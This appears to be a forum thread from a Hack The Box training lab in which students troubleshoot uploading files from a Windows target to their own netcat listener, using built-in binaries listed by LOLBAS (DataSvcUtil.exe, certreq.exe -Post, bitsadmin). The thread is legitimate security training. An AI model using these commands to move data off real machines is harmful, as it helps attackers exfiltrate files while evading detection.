HTB:
Resources:
https://lolbas-project.github.io/#/upload
I'm experimenting with various upload methods and can't seem to get any of them to work. They all have similar behavior. I start a netcat session:
sudo nc -lvnp 80
I then follow the commands on the LOLBAS page, for example:
PS C:\Users\htb-student> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe /out:C:\Users\htb-student\Test.txt /uri:http://10.10.16.50/test.txt
My netcat session detects a connection, but no file is uploaded.
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.16.50] from (UNKNOWN) [10.129.201.55] 49679
GET /test.txt/$metadata HTTP/1.1
Host: 10.10.16.50
Connection: Keep-Alive
Attempting to use certreq.exe gives a different error:
C:\Windows\System32\certreq.exe -Post -config http://10.10.16.50/ C:\Users\htb-student\Test.txt
Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
I’m feeling your pain here at the moment!
Certificate Request Processor: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
I believe the reason for that is an older version of CertReq. They do give a link to a newer version of it in the article; however, that obviously means we need to find another way to download THAT file to the computer.
Since I really wanted to try to get CertReq working, I just used wget to download the newer exe. Unfortunately I then hit another obstacle: I realised that this requires it to be a POST request, and serving up the file via a Python web server or the like doesn't do this by default.
I tried using bitsadmin as per the instructions in the same academy section, and that gave its own unique types of errors (The parameter is incorrect.).
I do think it would be helpful if the exercises could be run on a target machine that actually had working versions of the methods that we’re being told to practice with. There’s “learning based on practice” and then there’s “learning based on hitting your head against a wall”.
I totally agree!
Glad it wasn’t just me. Never found a solution to this. Eventually I gave up and moved on!
Greetings to all.
When the new certreq.exe is downloaded (by any of the many different ways) on the target machine, make sure to include the file path of the new file and then fill in the rest of the command; otherwise you would still be running the older version. Another issue was that the NC listening port might not be working (Ncat: bind to 0.0.0.0:80: Address already in use. QUITTING.). In this case just try another HTTP port.
Persistence is a virtue!